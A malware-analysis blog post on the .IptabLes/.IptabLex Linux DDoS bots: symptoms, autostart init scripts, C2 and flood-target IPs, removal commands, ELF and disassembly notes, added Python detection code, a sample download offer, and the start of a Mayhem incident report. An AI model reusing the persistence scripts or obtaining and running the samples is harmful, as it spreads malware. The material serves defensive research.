Monday, June 16, 2014

MMD-0025-2014 - ITW Infection of ELF .IptabLex & .IptabLes China #DDoS bots malware

The background

Some Linux sysadmins and malware researchers already know this issue well, either from references in sysadmin/Linux forums, from incidents reported at work, or from facing the problem themselves. Since the wave of attacks is still being spotted, hitting several services through known web application vulnerabilities, and there is no complete verdict on the threat yet, we feel it is important to raise an alert on this subject in an MMD post, as an advisory for fellow admins who google for information on this threat, hoping it gives them a thorough explanation. The recent vulnerability exploited to spread this infection is as tweeted here:

Some of us may think that DDoS tools are only kids infiltrating unattended sites and installing bots written as IRC Perl/PHP DDoS'er scripts. This post is a good read for you if you think that way, since it explains a more serious threat: ELF DoS binaries built specifically to conduct DDoS attacks from hacked Linux servers, with a serious root exploitation method in each infection. This threat is known as the .IptabLex and .IptabLes ELF #DDoS backdoor trojan (malware). The infection came from China and is now worldwide, hitting various Linux based services through newly found vulnerabilities and giving problems to some of us.
Here go the details..

The worldwide incidents reported

First, what is the coverage of this infection? Below is the list of reported incidents of the current threat worldwide, which I followed and collected in chronological order; all refer to the same binary sets and a similar infection modus operandi. The infected servers' distributions vary, from Debian, Ubuntu, Slackware and CentOS to Red Hat, compromised via vulnerabilities in server applications like Tomcat, Elasticsearch, Apache Struts etc. All of them report the same hack vector: a code injection vulnerability.
FYI: no, we have not seen any FreeBSD or Mac OS X based server as a victim (yet).

Jan 13 2014 at 15:26 (CHINA) [link]
Jan 18 2014 at 19:11 (EUROPE) [link]
Apr 10, 2014 (N/A) [link]
Apr 25, 2014 (N/A) [link]
May 4 2014 (HUNGARY) [link]
May 8 2014 (USA) [link]
May 12 2014 (US) [link]
May 25, 2014 (N/A) [link]
May 27, 2014 (VIETNAM) [link]
May 27, 2014 (N/A) [link]
Jun 3, 2014 (EUROPE) [link]
Jun 4, 2014 (N/A) [link]
Jun 8 2014 (EUROPE) [link]

Source of threat

The origin of the threat is China, which the next analysis sections describe technically; there are also many reports posted about the threat on Chinese sites, referenced here -->>[here]

The symptoms of infection

An infected Linux host will suffer a root privilege escalation and be installed with the malware set as per the details below.

The main malware files will be located in either /boot or /usr as per below. It first tries to write to /boot; if that fails, the malware is saved in /usr.

/boot/.IptabLes
/boot/.IptabLex
Or..
/usr/.IptabLes
/usr/.IptabLex

The malware is accompanied by autostart scripts:

$ ll -a /boot/Ip*
IptabLes -> /etc/rc.d/init.d/IptabLes
IptabLex -> /etc/rc.d/init.d/IptabLex
Contents:
$ sudo cat /etc/rc.d/init.d/IptabLex
#!/bin/sh
/boot/.IptabLex
exit 0

$ sudo cat /etc/rc.d/init.d/IptabLes
#!/bin/sh
/boot/.IptabLes
exit 0
The PID lock files can be detected:
$ ll -a /[InfectedPath]/
.mylisthb.pid
.mylisthbS.pid
.mylisthbSx.pid
.mylisthbx.pid
↑ In most cases we found these files in the root (/) directory.

In the case I handled, the binaries and autostart scripts had these sizes:

-r----x--x   1 xxx xxx 1103207 Apr 25 16:38 .IptabLes*
-r----x--x   1 xxx xxx  722392 Apr 25 16:38 .IptabLex*
-r----x--x   1 xxx xxx      33 Apr 25 16:IptabLes*
-r----x--x   1 xxx xxx      33 Apr 25 16:IptabLex*
The first two are the malware binaries themselves, followed by the autostart scripts. Usually the infected host has both binaries. The bigger one is the newer "advanced" version, and the smaller one is the limited version.

In some cases the "advanced" version has runtime problems and crashes with a segmentation fault, as in the lsof output below:

$ sudo lsof -p 27322
.IptabLes 27322 root  cwd    DIR  253,0     4096       2 /
.IptabLes 27322 root  rtd    DIR  253,0     4096       2 /
.IptabLes 27322 root  txt    REG  104,1  1103243    5905 /boot/.IptabLes
.IptabLes 27322 root    0u   REG  253,0        5   98310 /.mylisthbS.pid
.IptabLes 27322 root    1u   REG  253,0        5   98313 /.mylisthb.pid
.IptabLes 27322 root    2u  sock    0,5      0t0 3442424 can't identify protocol
.IptabLes 27322 root    3u   raw             0t0 3445564 00000000:00FF->00000000:0000 st=07
.IptabLes 27322 root    4u   raw             0t0 3445565 00000000:00FF->00000000:0000 st=07
.IptabLes 27322 root    5u   raw             0t0 3445566 00000000:00FF->00000000:0000 st=07
The smaller one mostly runs well, as per the reported lsof:
$ sudo lsof -p 2013
.IptabLex 2013 root  cwd    DIR   253,0     4096     2 /
.IptabLex 2013 root  rtd    DIR   253,0     4096     2 /
.IptabLex 2013 root  txt    REG   104,1   722580  5906 /boot/.IptabLex
.IptabLex 2013 root    0u   REG   253,0        5 98309 /.mylisthbSx.pid
.IptabLex 2013 root    1uW  REG   253,0        5 98311 /.mylisthbx.pid
.IptabLex 2013 root    2u  IPv4 3479690      0t0   TCP x.x.x.x:10038->59.63.167.168:1001 (ESTABLISHED)
Once the malware is running successfully and connected to the backdoor, the netstat connection looks like this:
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0    157 x.x.x.x:53534     119.145.148.76:905      ESTABLISHED 20543/.IptabLex     
Some UDP ports will also be opened, as per below:
udp  0   0 0.0.0.0:51152  0.0.0.0:*  20595/.IptabLes
udp  0   0 0.0.0.0:51152  0.0.0.0:*  20595/.IptabLes
udp  0   0 0.0.0.0:43193  0.0.0.0:*  20832/.IptabLes
udp  0   0 0.0.0.0:43193  0.0.0.0:*  20832/.IptabLes
udp  0   0 0.0.0.0:43193  0.0.0.0:*  20832/.IptabLes
udp  0   0 0.0.0.0:43193  0.0.0.0:*  20832/.IptabLes
And the SYN packets generated from the infected host will look like this:
tcp  0   1 x.x.x.x:52831  59.63.167.167:666       SYN_SENT    20539/.IptabLes
tcp  0   1 x.x.x.x:36089  119.145.148.56:666      SYN_SENT    20389/.IptabLes
tcp  0   1 x.x.x.x:36089  119.145.148.56:666      SYN_SENT    20389/.IptabLes
tcp  0   1 x.x.x.x:34365  112.33.19.8:666         SYN_SENT    20595/.IptabLes
tcp  0   1 x.x.x.x:34365  112.33.19.8:666         SYN_SENT    20595/.IptabLes
tcp  0   1 x.x.x.x:34365  112.33.19.8:666         SYN_SENT    20595/.IptabLes
tcp  0   1 x.x.x.x:35443  122.228.242.51:666      SYN_SENT    20595/.IptabLes
tcp  0   1 x.x.x.x:35443  122.228.242.51:666      SYN_SENT    20595/.IptabLes
tcp  0   1 x.x.x.x:35443  122.228.242.51:666      SYN_SENT    20595/.IptabLes
tcp  0   1 x.x.x.x:58164  59.63.167.167:666       SYN_SENT    20595/.IptabLes
tcp  0   1 x.x.x.x:36720  119.145.148.56:666      SYN_SENT    20595/.IptabLes
tcp  0   1 x.x.x.x:36720  119.145.148.56:666      SYN_SENT    20595/.IptabLes
tcp  0   1 x.x.x.x:55258  119.145.148.76:666      SYN_SENT    20613/.IptabLex
tcp  0   1 x.x.x.x:55258  119.145.148.76:666      SYN_SENT    20613/.IptabLex
tcp  0   1 x.x.x.x:55389  119.145.148.76:666      SYN_SENT    20860/.IptabLex
tcp  0   1 x.x.x.x:34994  112.33.19.8:666         SYN_SENT    20832/.IptabLes
tcp  0   1 x.x.x.x:55389  119.145.148.76:666      SYN_SENT    20860/.IptabLex
tcp  0   1 x.x.x.x:34994  112.33.19.8:666         SYN_SENT    20832/.IptabLes
tcp  0   1 x.x.x.x:55389  119.145.148.76:666      SYN_SENT    20860/.IptabLex
tcp  0   1 x.x.x.x:34994  112.33.19.8:666         SYN_SENT    20832/.IptabLes
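As an added example (not code from the MMD post), the Python below turns the host indicators listed in this section into a small checker: it parses netstat-style lines for sockets owned by .IptabLes/.IptabLex, pulls out the port 666 SYN_SENT targets, and looks for the file artifacts named above (binaries, init scripts, the /boot symlinks from the ll listing, and the PID lock files). The netstat sample is constructed from the listings above with 10.0.0.5 standing in for the infected host's x.x.x.x; find_artifacts() takes a root directory so it can be exercised against a temporary tree as well as "/" on a live host.

```python
import re
import tempfile
from pathlib import Path

# Constructed sample of `netstat -anp` output, modelled on the listings in the post.
# 10.0.0.5 stands in for the infected host's address (x.x.x.x in the post).
SAMPLE_NETSTAT = """\
tcp        0    157 10.0.0.5:53534     119.145.148.76:905      ESTABLISHED 20543/.IptabLex
udp        0      0 0.0.0.0:51152      0.0.0.0:*                          20595/.IptabLes
tcp        0      1 10.0.0.5:52831     59.63.167.167:666       SYN_SENT    20539/.IptabLes
tcp        0      1 10.0.0.5:36089     119.145.148.56:666      SYN_SENT    20389/.IptabLes
tcp        0      1 10.0.0.5:36089     119.145.148.56:666      SYN_SENT    20389/.IptabLes
tcp        0      0 10.0.0.5:22        10.0.0.9:51000          ESTABLISHED 1234/sshd
"""

# Program-name column as netstat prints it: "<pid>/<name>"
PROC_RE = re.compile(r"^(\d+)/(\.IptabLe[sx])$")

# File artifacts named in the post, relative to the filesystem root
BINARY_PATHS = ["boot/.IptabLes", "boot/.IptabLex", "usr/.IptabLes", "usr/.IptabLex"]
INIT_SCRIPTS = ["etc/rc.d/init.d/IptabLes", "etc/rc.d/init.d/IptabLex"]
INIT_LINKS = ["boot/IptabLes", "boot/IptabLex"]  # symlinks seen in the `ll -a /boot/Ip*` listing
PID_FILES = [".mylisthb.pid", ".mylisthbS.pid", ".mylisthbSx.pid", ".mylisthbx.pid"]


def parse_netstat(text):
    """Return one dict per socket line owned by an .IptabLes/.IptabLex process."""
    hits = []
    for raw in text.splitlines():
        fields = raw.split()
        if len(fields) < 6:
            continue
        m = PROC_RE.match(fields[-1])
        if not m:
            continue
        proto, local, remote = fields[0], fields[3], fields[4]
        # UDP lines carry no State column, so the program name is the 6th field, not the 7th
        state = fields[5] if len(fields) >= 7 else ""
        hits.append({"pid": int(m.group(1)), "prog": m.group(2), "proto": proto,
                     "local": local, "remote": remote, "state": state})
    return hits


def suspicious_pids(text):
    """Distinct PIDs of the bot processes (to be stopped before the files are removed)."""
    return sorted({h["pid"] for h in parse_netstat(text)})


def flood_targets(text):
    """Remote endpoints the bot is SYN flooding (port 666 in SYN_SENT, as in the post)."""
    return sorted({h["remote"] for h in parse_netstat(text)
                   if h["proto"] == "tcp" and h["state"] == "SYN_SENT"
                   and h["remote"].endswith(":666")})


def find_artifacts(root="/"):
    """Return the malware files present under `root` (use "/" on a live host)."""
    base = Path(root)
    found = []
    for rel in BINARY_PATHS + INIT_SCRIPTS + INIT_LINKS + PID_FILES:
        p = base / rel
        if p.is_symlink() or p.exists():
            found.append(rel)
    return found


def demo_artifacts():
    """Stage the /boot variant in a temporary tree and run the file check against it."""
    with tempfile.TemporaryDirectory() as tmp:
        for rel in ["boot/.IptabLes", "boot/.IptabLex",
                    "etc/rc.d/init.d/IptabLes", ".mylisthbS.pid"]:
            p = Path(tmp) / rel
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_bytes(b"")
        return find_artifacts(tmp)


if __name__ == "__main__":
    print("bot PIDs:", suspicious_pids(SAMPLE_NETSTAT))
    print("flood targets:", flood_targets(SAMPLE_NETSTAT))
    print("artifacts in temp tree:", demo_artifacts())
```

On a live host, feed it the real `netstat -anp` output and call find_artifacts("/"); the PID list is the set to stop first, since the bot recreates its lock files and the init scripts restart it on the next boot if only the files are removed.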

Definition of the Malware

This malware is a DDoS bot ELF malware variant, with a bot backdoor function connecting to the CNC, which sends it instructions to attack targeted hosts using SYN flood or DNS flood DoS techniques. It is autostarted as a daemon every time the host's services start.

So far we see no RAT (Remote Access Trojan) functionality, only the specific DoS bot functions, and also no sign of rootkits or deletion of the system environment, apart from the addition of the autostart scripts.
This malware can be removed safely by executing the commands below:

$ sudo rm -f /.mylisthb*
$ sudo rm -f /boot/.IptabLex
$ sudo rm -f /boot/.IptabLes
$ sudo rm -f /usr/.IptabLex
$ sudo rm -f /usr/.IptabLes
$ sudo rm -f /etc/rc.d/init.d/IptabLex
$ sudo rm -f /etc/rc.d/init.d/IptabLes
From further observation of the binaries we know that it originated in a Chinese Linux environment.

According to the reported cases, it has backdoors connecting to Chinese IP addresses, as per the recorded data below:

119.145.148.76||4134 | 119.144.0.0/14 | CHINANET | CN | CHINATELECOM.COM.CN | CHINANET GUANGDONG PROVINCE NETWORK
42.62.36.237  ||23724 | 42.62.32.0/21   | CHINANET-IDC-BJ | CN | - | FOREST ETERNAL COMMUNICATION TECH. CO.LTD
And the recorded targets also go to Chinese networks:
119.145.148.56||4134 | 119.144.0.0/14 | CHINANET | CN | CHINATELECOM.COM.CN | CHINANET GUANGDONG PROVINCE NETWORK
59.63.167.167||4134 | 59.62.0.0/15 | CHINANET | CN | CHINATELECOM.COM.CN | CHINANET JIANGXI PROVINCE NETWORK
59.63.167.168 ||4134  | 59.62.0.0/15    | CHINANET | CN | CHINATELECOM.COM.CN | CHINANET JIANGXI PROVINCE NETWORK
112.33.19.8||9808 | 112.0.0.0/10 | CMNET | CN | CHINAMOBILELTD.COM | CHINA MOBILE COMMUNICATIONS CORPORATION
61.147.110.119||23650 | 61.147.110.0/24 | CHINANET-JS-AS | CN | CHINATELECOM.COM.CN | CHINANET JIANGSU PROVINCE NETWORK
61.174.41.15|15.41.174.61.dial.hu.zj.dynamic.163data.com.cn.|4134 | 61.174.0.0/16 | CHINANET | CN | CHINATELECOM.COM.CN | CHINANET-ZJ NINGBO NODE NETWORK

Binary Analysis

ELF file type:

IptabLes: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
IptabLex: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
With these notes:
- There is no dynamic section in this file.
- There are no section groups in this file.
- There are no relocations in this file.
- There are no unwind sections in this file.
The header:
  Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 
  Class:                             ELF32
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           Intel 80386
  Version:                           0x1
  Entry point address:               0x8048110
  Start of program headers:          52 (bytes into file)
  Start of section headers:          648072 (bytes into file)
  Flags:                             0x0
  Size of this header:               52 (bytes)
  Size of program headers:           32 (bytes)
  Number of program headers:         5
  Size of section headers:           40 (bytes)
  Number of section headers:         39
  Section header string table index: 36
..and Section Headers:
Section Headers:
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .note.ABI-tag     NOTE            080480d4 0000d4 000020 00   A  0   0  4
  [ 2] .init             PROGBITS        080480f4 0000f4 000017 00  AX  0   0  4
  [ 3] .text             PROGBITS        08048110 000110 0695a8 00  AX  0   0 16
  [ 4] __libc_freeres_fn PROGBITS        080b16c0 0696c0 00100f 00  AX  0   0 16
  [ 5] __libc_thread_fre PROGBITS        080b26d0 06a6d0 0001db 00  AX  0   0 16
  [ 6] .fini             PROGBITS        080b28ac 06a8ac 00001c 00  AX  0   0  4
  [ 7] .rodata           PROGBITS        080b28e0 06a8e0 01554c 00   A  0   0 32
  [ 8] __libc_atexit     PROGBITS        080c7e2c 07fe2c 000004 00   A  0   0  4
  [ 9] __libc_subfreeres PROGBITS        080c7e30 07fe30 000030 00   A  0   0  4
  [10] __libc_thread_sub PROGBITS        080c7e60 07fe60 000008 00   A  0   0  4
  [11] .stapsdt.base     PROGBITS        080c7e68 07fe68 000001 00   A  0   0  1
  [12] .eh_frame         PROGBITS        080c7e6c 07fe6c 00b4fc 00   A  0   0  4
  [13] .gcc_except_table PROGBITS        080d3368 08b368 00010c 00   A  0   0  1
  [14] .tdata            PROGBITS        080d4474 08b474 000014 00 WAT  0   0  4
  [15] .tbss             NOBITS          080d4488 08b488 000018 00 WAT  0   0  4
  [16] .ctors            PROGBITS        080d4488 08b488 000008 00  WA  0   0  4
  [17] .dtors            PROGBITS        080d4490 08b490 00000c 00  WA  0   0  4
  [18] .jcr              PROGBITS        080d449c 08b49c 000004 00  WA  0   0  4
  [19] .data.rel.ro      PROGBITS        080d44a0 08b4a0 00002c 00  WA  0   0  4
  [20] .got              PROGBITS        080d44cc 08b4cc 000008 04  WA  0   0  4
  [21] .got.plt          PROGBITS        080d44d4 08b4d4 00000c 04  WA  0   0  4
  [22] .data             PROGBITS        080d44e0 08b4e0 000900 00  WA  0   0 32
  [23] .bss              NOBITS          080d4de0 08bde0 0041f8 00  WA  0   0 32
  [24] __libc_freeres_pt NOBITS          080d8fd8 08bde0 000014 00  WA  0   0  4
  [25] .comment          PROGBITS        00000000 08bde0 000398 00      0   0  1
  [26] .debug_aranges    PROGBITS        00000000 08c178 000120 00      0   0  1
  [27] .debug_pubnames   PROGBITS        00000000 08c298 000850 00      0   0  1
  [28] .debug_info       PROGBITS        00000000 08cae8 0079a5 00      0   0  1
  [29] .debug_abbrev     PROGBITS        00000000 09448d 0014a8 00      0   0  1
  [30] .debug_line       PROGBITS        00000000 095935 0018a2 00      0   0  1
  [31] .debug_frame      PROGBITS        00000000 0971d8 000cfc 00      0   0  4
  [32] .debug_str        PROGBITS        00000000 097ed4 0016f2 01  MS  0   0  1
  [33] .debug_loc        PROGBITS        00000000 0995c6 0046d9 00      0   0  1
  [34] .debug_ranges     PROGBITS        00000000 09dc9f 000300 00      0   0  1
  [35] .note.stapsdt     NOTE            00000000 09dfa0 000230 00      0   0  4
  [36] .shstrtab         STRTAB          00000000 09e1d0 0001b8 00      0   0  1
  [37] .symtab           SYMTAB          00000000 09e9a0 009700 10     38 948  4
  [38] .strtab           STRTAB          00000000 0a80a0 0085f4 00      0   0  1
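The readelf output above is just the decoding of a fixed 52-byte ELF32 header. As an added example (not code from the post), the Python below packs a header with exactly the values readelf printed for this sample, decodes it back with struct, and works out where the program header and section header tables sit in the file; it also rejects non-ELF input, since a triage script will be fed arbitrary files. Everything here is the standard ELF32 layout; the only sample-specific numbers are those copied from the listing above.

```python
import struct

# ELF32 header layout (52 bytes): e_ident[16], then 2 x u16, 5 x u32, 6 x u16
ELF32_EHDR = struct.Struct("<16sHHIIIIIHHHHHH")

ELF_CLASS = {1: "ELF32", 2: "ELF64"}
ELF_DATA = {1: "2's complement, little endian", 2: "2's complement, big endian"}
ELF_TYPE = {1: "REL", 2: "EXEC", 3: "DYN", 4: "CORE"}
ELF_MACHINE = {3: "Intel 80386", 62: "Advanced Micro Devices X86-64"}


def build_sample_header():
    """Constructed 52-byte header carrying the values readelf printed for the sample above."""
    # e_ident: magic, EI_CLASS=1 (32-bit), EI_DATA=1 (LSB), EI_VERSION=1, OSABI=0, ABIVERSION=0, pad
    ident = b"\x7fELF" + bytes([1, 1, 1, 0, 0]) + b"\x00" * 7
    #                type machine version entry    phoff shoff  flags ehsize phentsize phnum shentsize shnum shstrndx
    return ELF32_EHDR.pack(ident, 2, 3, 1, 0x8048110, 52, 648072, 0, 52, 32, 5, 40, 39, 36)


def parse_elf32_header(data):
    """Decode an ELF32 little-endian header; raise ValueError for anything that is not one."""
    if len(data) < ELF32_EHDR.size:
        raise ValueError("too short for an ELF32 header")
    (ident, e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, e_flags,
     e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum,
     e_shstrndx) = ELF32_EHDR.unpack(data[:ELF32_EHDR.size])
    if ident[:4] != b"\x7fELF":
        raise ValueError("bad ELF magic")
    if ident[4] != 1 or ident[5] != 1:
        raise ValueError("this parser handles ELF32 little-endian files only")
    if e_ehsize != ELF32_EHDR.size:
        raise ValueError("e_ehsize does not match an ELF32 header")
    return {
        "class": ELF_CLASS[ident[4]],
        "data": ELF_DATA[ident[5]],
        "os_abi": "UNIX - System V" if ident[7] == 0 else "other (%d)" % ident[7],
        "abi_version": ident[8],
        "type": ELF_TYPE.get(e_type, "unknown (%d)" % e_type),
        "machine": ELF_MACHINE.get(e_machine, "unknown (%d)" % e_machine),
        "e_version": e_version, "e_entry": e_entry, "e_phoff": e_phoff,
        "e_shoff": e_shoff, "e_flags": e_flags, "e_phentsize": e_phentsize,
        "e_phnum": e_phnum, "e_shentsize": e_shentsize, "e_shnum": e_shnum,
        "e_shstrndx": e_shstrndx,
    }


def is_elf32_le(data):
    """Boolean wrapper for triage loops over arbitrary files."""
    try:
        parse_elf32_header(data)
        return True
    except ValueError:
        return False


def program_table_span(hdr):
    """(start, end) file offsets of the program header table."""
    return hdr["e_phoff"], hdr["e_phoff"] + hdr["e_phnum"] * hdr["e_phentsize"]


def section_table_span(hdr):
    """(start, end) file offsets of the section header table."""
    return hdr["e_shoff"], hdr["e_shoff"] + hdr["e_shnum"] * hdr["e_shentsize"]


if __name__ == "__main__":
    hdr = parse_elf32_header(build_sample_header())
    for key, value in hdr.items():
        print("%-12s %s" % (key, hex(value) if isinstance(value, int) else value))
    print("program headers at", program_table_span(hdr))
    print("section headers at", section_table_span(hdr))
```

On the constructed header the section table spans (648072, 649632), i.e. 0x9e388 to 0x9e9a0, and 0x9e9a0 is exactly the file offset readelf shows for .symtab in the section listing above, so the header and the section table of this sample agree. Note that "statically linked" cannot be read from the header alone; it comes from the program headers (no PT_INTERP / PT_DYNAMIC), which is what readelf's "There is no dynamic section in this file" note reflects.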
The smaller and bigger versions differ in their Symbol table '.symtab' entries; if you diff the function tables, the newer version (the bigger one) suggests an "advanced mode" version with "pro" features:
  2030: 08049750   130 FUNC    GLOBAL DEFAULT    3 CheckPro
  1946: 08049820    40 FUNC    GLOBAL DEFAULT    3 AddProList
  1022: 080496c0    39 FUNC    GLOBAL DEFAULT    3 FreeProList
  1671: 08049850   106 FUNC    GLOBAL DEFAULT    3 CreateProlist
..and it also has more additional "features":
   424: 0806816e    13 FUNC    LOCAL  DEFAULT    3 _L_lock_30
   425: 0806817b    10 FUNC    LOCAL  DEFAULT    3 _L_unlock_120
  1022: 080496c0    39 FUNC    GLOBAL DEFAULT    3 FreeProList
  1081: 08068190   159 FUNC    GLOBAL DEFAULT    3 __getdents
  1162: 08049950   191 FUNC    GLOBAL DEFAULT    3 FindPtr
  1242: 080676f0   107 FUNC    GLOBAL DEFAULT    3 __strncasecmp
  1258: 0804ca20   442 FUNC    GLOBAL DEFAULT    3 killpeofnames
  1379: 080680c0   174 FUNC    WEAK   DEFAULT    3 readdir
  1381: 080d40c0 0x5aadd OBJECT  GLOBAL DEFAULT   22 filebyte
  1438: 080676f0   107 FUNC    WEAK   DEFAULT    3 strncasecmp
  1632: 08049a10    57 FUNC    GLOBAL DEFAULT    3 FindCptr
  1670: 080680c0   174 FUNC    GLOBAL DEFAULT    3 __readdir
  1760: 08049be0   208 FUNC    GLOBAL DEFAULT    3 WriteToFiles
  1785: 08050060   325 FUNC    GLOBAL DEFAULT    3 __deallocate_stack
  2041: 080d40a0     4 OBJECT  GLOBAL DEFAULT   22 constfilesize
  2052: 0804c720   106 FUNC    GLOBAL DEFAULT    3 tttaaa
  2209: 0804c6c0    82 FUNC    GLOBAL DEFAULT    3 mystristr
  2212: 0812ebc0   576 OBJECT  GLOBAL DEFAULT   22 tttxsa

Reverse Engineering Highlights

These are the C source code files of this malware, as listed in the binary:

'crtstuff.c'
'atk.c'
'common.c'
'zlib.c'
'list.c'
'main.c'
'mypth.c'
'Service.c'
'srvnet.c'
'udptest.c'
Reversing this malware is interesting, and overall the reverse effort took longer than I thought. In this highlight I will guide you along the best route to the malicious code, to PoC the verdict on the DoS activities. After choosing your disassembler, I suggest you start trailing the function at .text:0804DA40 called startmain(), to find the trail that leads you to the DDoS functions (the verdict) soonest:
public startmain
startmain   proc near 
var_18      = dword ptr -18h
var_14      = dword ptr -14h
var_10      = dword ptr -10h
arg_0       = dword ptr  8
push    ebp
mov     ebp, esp
push    edi
mov     edi, offset aBoot_iptables ; contains "/boot/.IptabLes or Iptablex"
push    esi
push    ebx
  :
You should find the PID and its locking, which can be followed afterwards from .text:0804DAF5 (to check that you are trailing the right path..):
mov     [esp+18h+var_18], offset LOCKFILEX ; "/.mylisthbS"
call    promutex
sub     eax, 1
  :
call    getpid
call    fork
Followed by the fork function at .text:080533B0 below:
fork    proc near           
        push    ebp         
        mov     ebp, esp
        pop     ebp
        jmp     __libc_fork
fork    endp
Seek the calls that lead to this function's start address (0x80533B0) and you will see the main DDoS functions directly referring to it:
SynFloodThread
DnsFloodThread
The above functions are the DoS functions, reversed here-->>[Pastebin] and here-->>[Pastebin], which can be broken down further into how the SYN or UDP packets are formed, the randomization of size, the build, and then the sending thread. I will not cover the details of those sub functions here since it would get very long (but please feel free to comment with requests); the pastebins show enough evidence of the attack performed by this flooder.

Let's move on. In .rodata:080B3360 you'll find the URLs that the malware uses for "test purposes", which help to PoC the origin of this malware without much heavy reversing:

h00p://www.yahoo.com
h00p://www.baidu.com
h00p://www.china.com
h00p://www.ifeng.com
As you can see, three of the listed sites are Chinese web sites. Other things that help to ID it are the multilanguage Linux traces detected and the way the binaries were compiled (based on previous references to similar threats from the same origin, it is typical).

More malicious activities: the update server's data (link), which clearly shows fetching the updates, saving them and deleting them when done; the infected host's sensitive information being taken (link); getting networking information of the infected host (link); and the hard coded installation of the autostart scripts and installation steps (link), which PoC all of the symptoms written above. For handling its own data, this malware uses compression logic with decompression logic that is "spaghetti coded", like the image below:

..with the code viewable here (link). Note: all reversed snippets can be viewed in each of the disassembler links shown.

Analysis Samples & Virus Total

The samples are all in Virus Total already with the hashes below, with detection ratios between 3/54 and 8/54:

4baf340e3701b640ad36fb8f606e2aa7f494dd34dc3315c0943f3325c7766f80
a65f430a03c3717250d15d5745ec7c36a60962ae6473938ee545a0267b6857a4
86f34d9974f42ed557f4ae998da50af04b04b03c7e5cf01279ad1ca6bbb4ab1a
fa5e8571c93abbaf7014c9fcecffedeffdac0a3a15d459036fb149a47dfcfb61
d3dafa7f23858711a5fbc195f934b6891114e44d23c86796b2c042f1c2b6e026
ec546a0084120070ee0ea6f00673e42ca13c85f5bd8375a4e62d88541152de6d
(thanks to "Angel Hun" for the last two samples!)
For fellow researchers, sysadmins and IR friends, I am sharing the samples below:
2014/04/25  16:38         1,103,207 boot-.IptabLes
2014/04/25  16:38           722,392 boot-.IptabLex
2014/04/25  16:39                33 etc-rc.d-init.d-IptabLes
2014/04/25  16:39                33 etc-rc.d-init.d-IptabLex
2014/01/19  16:09         1,103,245 src-IptabLes
2014/01/19  16:09           722,582 src-IptabLex
They can be downloaded here-->>[MMD Mediafire] with the usual password.

Intelligence Report of Iptables|x

Tiger Security [link], the cyber intelligence and information security company, has just released a detailed intelligence report on this threat, explaining the CNC operation behind the scenes, as written in their good report here-->[link]

Additionals:

Questions and comments are welcome. I need more samples from recent incidents; if you happen to have some, please help by sending the sample via the DropBox link in the right panel of this blog's menu. Comments containing sensitive or private information will not be posted. Thank you in advance.

#MalwareMustDie!

Wednesday, June 11, 2014

MMD-0024-2014 - Recent Incident Report of Linux/Mayhem (LD_PRELOAD) libworker.so "Mayhem" Linux malware botnet attack in Joomla! VPS

I haven't had enough time to write a beautiful report about this incident, so please bear with the textual paste format for the moment. This is an important incident report, continuing the massive infection malware case initially reported here-->>[MMD Blog]. The latest reported incident before this one is here-->>[MMD Pastebin]

The raw text of the current incident report is here-->>[MMD Pastebin] and here-->>[MMD Pastebin]; the video tutorial on how to extract, kill, debug and capture the traffic of ELF .so shared library malware that uses LD_PRELOAD is here-->>[MMD Blog]

..and below are the current incident's textual contents:

MalwareMustDie NEW Report of .SO ELF Malware attack incident.
date: Wed Jun 11 06:38:13 JST 2014
Analysis by @unixfreaxjp - Report & source investigation thx to: yin
Case: http://blog.malwaremustdie.org/2014/05/elf-shared-so-dynamic-library-malware.html
CNC is ALIVE in : "89.45.14.64 (VOXILITY, ROMANIA)"
ATTACKER SOURCE IP: "103.31.186.33 (VOXILITY, ROMANIA) &  31.202.247.234 (Leased line ISP Format, UKRAINE)"

//-------------------------------------
// PHP HACK INJECTION POC
// VICTIMS WEBAPP: JOOMLA!
//-------------------------------------

// Reported Injected installation .SO Bins
https://www.virustotal.com/en/file/324b1b77ff9c0759e3d2ab1efb9439a3a850d94bd9f1968a0f093a782b5ea990/analysis/1402437076/
https://www.virustotal.com/en/file/203eeac48d08cac9b36187bfb32bd88d29f1f44d4306f2ffc154538573e5d722/analysis/1402437106/

// Jinxed code installer PHP scripts in pastebin:
http://pastebin.com/z1K8jxKJ
http://pastebin.com/Pbsk3ZXU

// Malware Binaries extracted from installer PHP:
https://www.virustotal.com/en/file/c28e2ebc5046c1a03a8f689b757cf2a90d021eeaa0a5e9ec91aa33c76ee6237f/analysis/1402437331/
https://www.virustotal.com/en/file/af71138bc3b2e70fd1d8fd33c31a4707d686d893661a331aee68f223348e164e/analysis/1402437372/

//-------------------------------------
// CNC ANALYSIS
// Using knowhow from: http://blog.malwaremustdie.org/2014/05/elf-shared-so-dynamic-library-malware.html
//-------------------------------------

// Extract the bins w/ template:
$ date
Wed Jun 11 04:12:11 JST 2014
$
$ php ./sodump-template.php
SO x32 dumped 26848
SO x64 dumped 27288
MO x32 dumped 26848
MO x64 dumped 27288
$
$ ls -alF
total 600
drwxrwxrwx   2 xxx xxx    512 Jun 11 04:12 ./
drwxrwxrwx  13 xxx xxx    512 Jun 11 03:59 ../
-rw-r--r--   1 xxx xxx  26848 Jun 11 04:12 "libworker1-32.so"
-rw-r--r--   1 xxx xxx  27288 Jun 11 04:12 "libworker1-64.so"
-rw-r--r--   1 xxx xxx  26848 Jun 11 04:12 "libworker2-32.so"
-rw-r--r--   1 xxx xxx  27288 Jun 11 04:12 "libworker2-64.so"

$ md5 lib*
MD5 (libworker1-32.so) = 15584bc865d01b7adb7785f27ac60233
MD5 (libworker1-64.so) = f9aeda08db9fa8c1877e05fe0fd8ed21
MD5 (libworker2-32.so) = 15584bc865d01b7adb7785f27ac60233
MD5 (libworker2-64.so) = f9aeda08db9fa8c1877e05fe0fd8ed21
// note: only one x32 and one x64 binary are used for the multiple injections..


$ file lib*
libworker1-32.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
